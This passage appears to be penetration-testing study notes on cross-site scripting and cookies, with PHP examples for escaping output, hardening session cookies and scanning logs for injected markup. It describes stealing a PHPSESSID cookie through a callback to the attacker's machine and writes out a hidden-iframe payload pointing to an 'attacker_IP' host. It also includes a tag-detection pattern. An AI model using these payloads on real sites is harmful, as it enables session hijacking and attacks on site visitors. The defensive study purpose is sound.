If you inspect the page source and still see those raw characters (unencoded), it's vulnerable!
If input is not properly filtered (in PHP), the `htmlspecialchars` function should be used to properly escape it; it converts key characters (such as <, >, & and ") into HTML entities.
What's cookies and what can we do with them?
cookies -> websites use them to track state information about users. Cookies can be set with optional flags; we want to look for the Secure and HttpOnly flags
- Secure flag - instructs the browser to only send the cookie over encrypted (HTTPS) connections
- HttpOnly flag - instructs the browser to deny script access to the cookie (e.g. via document.cookie), so an injected script cannot read it
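As an added example (not code from these notes), the two defences described above in PHP: output escaping with `htmlspecialchars` and a session cookie set with the Secure and HttpOnly flags, plus a small checker for a raw Set-Cookie header. The function names `escape_html`, `start_hardened_session` and `cookie_has_flags` are chosen here, and the sample input is constructed.

```php
<?php
// Added example (not from the original notes): reflect user input safely and
// set the session cookie with the Secure and HttpOnly flags.

// Escape a string for insertion into an HTML body or attribute value.
// ENT_QUOTES also converts single quotes, so the result is safe inside
// single-quoted attributes too; an explicit UTF-8 charset avoids
// charset-confusion bypasses.
function escape_html(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Start the session with hardened cookie flags (PHP >= 7.3 options array).
function start_hardened_session(): void
{
    session_set_cookie_params([
        'secure'   => true,     // only sent over HTTPS
        'httponly' => true,     // not readable from document.cookie
        'samesite' => 'Strict', // not sent on cross-site requests
        'path'     => '/',
    ]);
    session_start();
}

// Check whether a raw Set-Cookie header value carries both flags.
// Handy when reviewing an application's responses during a test.
function cookie_has_flags(string $set_cookie): array
{
    $attrs = array_map('trim', explode(';', $set_cookie));
    // Skip the leading name=value pair; compare attribute names case-insensitively.
    $names = array_map(
        fn(string $a): string => strtolower(explode('=', $a, 2)[0]),
        array_slice($attrs, 1)
    );
    return [
        'secure'   => in_array('secure', $names, true),
        'httponly' => in_array('httponly', $names, true),
    ];
}

// Must run before any output, because it sends the Set-Cookie header.
start_hardened_session();

// Constructed input standing in for a query parameter such as $_GET['q'].
$input = 'Tom & Jerry <b onclick="x()">"bold"</b>';
echo 'You searched for: ' . escape_html($input);
// The tag and quotes are rendered as text (&lt;b ...&gt;), never parsed as markup.

// Example review of a header value, constructed here:
var_dump(cookie_has_flags('PHPSESSID=abc123; Path=/; Secure; HttpOnly'));
// -> ['secure' => true, 'httponly' => true]
var_dump(cookie_has_flags('PHPSESSID=abc123; Path=/'));
// -> ['secure' => false, 'httponly' => false]
```

Escaping must happen at output time, in the context where the value lands (HTML body or attribute here); a value that will be placed inside a script block or a URL needs a different encoder.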
The following script sends a GET request to the attacker's machine and forces the victim's browser to send the cookie (PHPSESSID) with it.
If a user logs into the server, we get a callback and steal the cookie.
Use a cookie editor to add the session info and visit admin-only pages!
The OSCP book didn't cover any non-client-facing XSS.
Client side attacks:
<iframe src=http://attacker_IP/malicious height="0" width="0"></iframe>
People who visit the site that has this invisible iframe will connect back to the attacker's machine! (The attacker can set up a netcat listener.)
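From the defender's side, an injected iframe like the one above usually arrives through a request parameter, so it leaves a trace in the web-server log. The following is an added example (not from these notes) that scans Apache combined-format log lines for HTML tags in decoded query strings; the log lines are constructed samples, and the names `query_from_log_line` and `find_injected_markup` are chosen here.

```php
<?php
// Added example (not from the original notes): flag web-server log entries
// whose query string carries markup that could be an injected iframe or script.
// The log lines below are constructed samples in Apache combined format.

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /guestbook.php?msg=%3Ciframe%20src%3Dhttp%3A%2F%2F192.0.2.10%2Fm%20height%3D%220%22%3E HTTP/1.1" 200 734 "-" "curl/8.0"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "POST /comment.php HTTP/1.1" 302 0 "-" "curl/8.0"
LOG;

// Tags that have no business appearing inside a query parameter.
const SUSPICIOUS_TAGS = '/<\s*(iframe|script|img|svg|object|embed)\b/i';

// Return the decoded query string of a log line, or null if there is none.
function query_from_log_line(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST|PUT) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    // Decode twice: payloads are sometimes double-encoded to slip past filters.
    return urldecode(urldecode($query));
}

// Return the log lines whose decoded query contains a suspicious tag.
function find_injected_markup(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $query = query_from_log_line($line);
        if ($query !== null && preg_match(SUSPICIOUS_TAGS, $query)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

foreach (find_injected_markup(SAMPLE_LOG) as $hit) {
    echo "suspicious: $hit\n";
}
// Only the second (guestbook.php) line is reported.
```

This only sees GET parameters; POST bodies are not in the access log, so a stored payload submitted via a form needs application-level logging or a WAF to catch. The real fix remains escaping output, as in the htmlspecialchars note above.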